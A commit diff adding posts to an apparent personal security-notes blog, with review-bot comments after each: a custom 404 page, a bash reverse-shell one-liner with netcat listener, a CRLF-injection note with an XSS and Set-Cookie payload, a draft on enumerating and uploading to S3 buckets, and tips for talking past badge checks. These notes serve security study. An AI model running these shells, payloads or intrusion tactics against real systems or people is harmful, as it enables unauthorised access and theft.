test custom 404

This commit is contained in:
casual 2024-09-03 22:36:04 +03:00
parent 321024f22f
commit f0d74bda0e
5 changed files with 174 additions and 0 deletions

content/404.md Normal file

@ -0,0 +1,23 @@
---
title: "[Error 404](/)"
hidden: true
noindex: true
layout: page
---
Hi! Sorry but link doesn't exist yet.
![](https://media1.tenor.com/m/3rAtEcJ09BcAAAAC/cat-loading.gif)
<!-- TODO download, upscale, host here - https://tenor.com/view/cat-loading-error-gif-19814836-->
It may be still in work or not posted yet.
If this link doesn't work for 1+ weeks, please contact me!
<!-- &nbsp; -->
<!-- &nbsp; -->
<!-- -->
<!-- [Take me home!](/) -->
<!-- thanks https://moonbooth.com/hugo/custom-404/ for guide -->
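Review bot: the image line `![](https://media1.tenor.com/m/3rAtEcJ09BcAAAAC/cat-loading.gif)` hot-links a third-party GIF, so every visitor who lands on a 404 has their browser contact tenor.com (leaking IP and referrer to a host outside your control), and the image can change or vanish without any change in this repo; the TODO on the next line already plans to self-host it, so put the file under `static/` and reference it by a relative path before this leaves the test stage. Two smaller points: `title: "[Error 404](/)"` is markdown inside a front-matter string and will show up verbatim wherever the theme emits the title as plain text (for example the `<title>` element), so a plain `title: "Error 404"` with the link kept in the body is safer; and the body text should read "Sorry, but this link doesn't exist yet." and "It may still be in progress or not posted yet."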


@ -0,0 +1,9 @@
+++
title = 'HowTo Bash ReverseShell'
date = 2024-09-04
+++
Listener - `nc -l 8081`
Reverse shell - `bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1`
May not work on hardened systems/containers.
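Review bot: the listener and the connect-back command don't agree on a port: `nc -l 8081` listens on 8081 while the redirection targets `/dev/tcp/<YOUR_IP_ADDRESS>/1337`, so the example cannot be reproduced as written; use one port in both lines (and note that `nc -l 8081` is OpenBSD-netcat syntax, traditional netcat expects `nc -l -p 8081`). The closing caveat "May not work on hardened systems/containers" would be more useful if it said why: `/dev/tcp` and the `>&` redirection are bash-only features (a `sh`/`dash` login shell, or a bash built without network redirection, lacks them), and egress filtering on the host or container network blocks the outbound connection outright, which is also the control defenders rely on here: an interactive shell opening an outbound TCP socket is a high-signal event for detection.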


@ -0,0 +1,26 @@
+++
title = 'HowTo CRLF'
date = 2024-09-18
+++
Mostly fixed thing! May occure in some handwritten web-servers<!--more-->
CRLF - Carriege Return (\r) Line Feed (\n) (or %0d %0a)
Inserting \r\n into URL allow attacker to:
- log splitting - to insert logs to server that may decieve administrator
- HTTP response slpitting - Allows to add HTTP headers to the HTTP response <!-- TODO how does it work? -->
- XSS - `www.target.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E` - disables XSS protection, set location to custom (but does it work without 302/201 status???), sets html content-type and injects javascript.
- cookie injection
- check another note
For example:
`GET /%0d%0aSet-Cookie:CRLFInjection=PreritPathak HTTP/1.1`
Will add `Set-Cookie:CRLFInjection=PreritPathak` header to HTTP response
{{< source >}}
https://www.geeksforgeeks.org/crlf-injection-attack/
{{< /source >}}
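Review bot: the open question in the XSS bullet ("does it work without 302/201 status???") has a definite answer that belongs in the note: browsers act on a `Location` header only for 3xx responses, so on a 200 it is simply ignored and the injected `Content-Type` plus body are what matters; likewise `X-XSS-Protection` is obsolete (Chromium removed its XSS auditor and Firefox never implemented the header), so that part of the payload does nothing in current browsers. The TODO "how does it work?" on the response-splitting bullet is answered by the `Set-Cookie` example already given: a server copies unsanitised input into a header value, the injected `\r\n` terminates that header early, and whatever follows is parsed as further headers (or, after a blank line, as the body). The reason the note opens with "Mostly fixed thing!" should be stated too: header-setting APIs in current server frameworks reject or strip CR and LF (Node throws `ERR_INVALID_CHAR`, Go's `net/http` replaces them with spaces), so the bug survives mainly in hand-written servers that assemble the response by string concatenation, which is exactly what to look for in a code review. Spelling: "occur", "Carriage Return", "splitting", "deceive".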


@ -0,0 +1,84 @@
+++
title = 'HowTo hack S3'
date = 2024-09-25
draft = true
+++
TODO ME
## What is S3?
### Abstract
S3 (Amazon Simple Storage Service) - object storage. You can think of it as cloud storage but designed for **storing and retrieving large files**. E.g. backups, archives, big data analytics, content distribution, and static website content.
S3 can be selfhosted (but you probably shouldn't do it). In other cases, company probably will use Amazon's S3.
S3 have "buckets" - container/folder for files.
### Technical
Interaction with S3 happens via RESTful API (`aws s3`).
Each bucket have its own settings:
- Region - each bucket is created in specific AWS region (for performance) - e.g. `https://<bucket-name>.s3.<region>.amazonaws.com/image.png`
- Name - each name should be unique across all AWS regions
- Storage class - how fast data can be accessed
- Lifecycle management - data can automatically be deleted or transfered to cheaper storage
- Versioning - S3 can keep snapshots of data
- Logging/monitoring
- Access control - the most interesting part for us. S3 have **public** and **private** buckets:
- In public bucket - any user can list content
- In private bucket - you should have credentials which have access to specific file
## Recon
### Find bucket endpoint
1. Try [Wappalyzer](https://www.wappalyzer.com/apps/)
2. [Spider](/hidden/todo/) site - `katana -js`
3. Search
### Find credentials
## Enumerate
Automatically:
https://github.com/sa7mon/S3Scanner
## Manually connect to S3
awscli:
```
aws configure
*написать что либо, в идеале легальный логин и пароль*
aws --endpoint=http://s3.smth.com s3 ls # list buckets
aws --endpoint=http://s3.smth.com s3 ls s3://smth # list files
aws s3 ls s3://whateverbucketname
aws --endpoint=http://s3.smth.com s3 cp smth s3://smth # upload
aws s3 mv Exploit.txt s3://whateverbucketname/
aws --endpoint=http://s3.smth.com s3 cp s3://smth # download
aws s3 cp s3://whateverbucketname/secret.txt
```
## Resources
- https://buckets.grayhatwarfare.com, a list with already discovered open buckets.
## Train
- http://flaws.cloud/
- http://flaws2.cloud/
{{< source >}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology#looking-for-vulnerabilities-2
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access#s3-buckets
https://freedium.cfd/https//medium.com/m/global-identity-2?redirectUrl=https%3A%2F%2Finfosecwriteups.com%2Ffinding-and-exploiting-s3-amazon-buckets-for-bug-bounties-6b782872a6c4
{{< /source >}}
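Review bot: the public/private description under "Access control" is too coarse to be accurate: S3 permissions come from bucket policies, bucket/object ACLs and the account-level Block Public Access setting, and listing (`s3:ListBucket`) and reading objects (`s3:GetObject`) are granted separately, so a bucket can refuse listing yet serve any object whose key is known, or the reverse; stating that distinction also makes the defender's fix explicit (Block Public Access on, deny-by-default bucket policy, versioning plus access logging to notice and undo unwanted changes). In the awscli block two commands are incomplete: `aws --endpoint=http://s3.smth.com s3 cp s3://smth # download` and `aws s3 cp s3://whateverbucketname/secret.txt` both lack the required destination argument (`aws s3 cp <src> <dest>`), and the documented option name is `--endpoint-url`. The line `*написать что либо, в идеале легальный логин и пароль*` ("enter anything, ideally a legitimate login and password") is in Russian while the rest of the post is English. Minor: "Find credentials" is an empty heading, and "each name should be unique across all AWS regions" should say bucket names are globally unique across all AWS accounts in a partition.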


@ -0,0 +1,32 @@
+++
title = 'HowTo learn Social Engineering'
date = 2024-09-11
+++
<!-- TODO xkcd meme -->
Social Engineering - its **Social** skills + Events **Engineering**<!--more-->
How to learn Social Engineering:
- Create new __Identity__ - "Today I will be Jack the electrician"
- Just start interact with **all** people
- Don't start speaking with same route: "Hello, I'm Jack, Who are you", do it differently every time
- Go pick up girls ~~and touch grass~~
- Especially speak with people you are uncomfortable with
- You need to have uncomfortable situations to master you being in stressful situations
- If they invite you to something weird that you usually don't want to do - Do it
- If you have to present something as a proof of your belonging in place where you shouldn't be - Don't show it.
Make your work office - penetretion testing lab
- Is there bage required? - Do not wear it and make some excuse. Talk your way out
Books for Social skill:
- "Built for Growth" - Chris Kuenne,
- "Coaching Habit" - Michael Stanier Bungay
{{< source >}}
https://www.youtube.com/watch?v=CldNso156QY
{{< /source >}}
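Review bot: the line "Make your work office - penetretion testing lab" is not a list item but sits between two bullets, so it renders as a stray paragraph that splits the list; indent it as a sub-bullet of the preceding point or fold it into the next one. Two factual fixes in the book list: the author of "The Coaching Habit" is Michael Bungay Stanier (the surname order is swapped), and "Built for Growth" is co-authored by Chris Kuenne and John Danner. Spelling: "penetration", "badge", and "its" should be "it's" in the opening line.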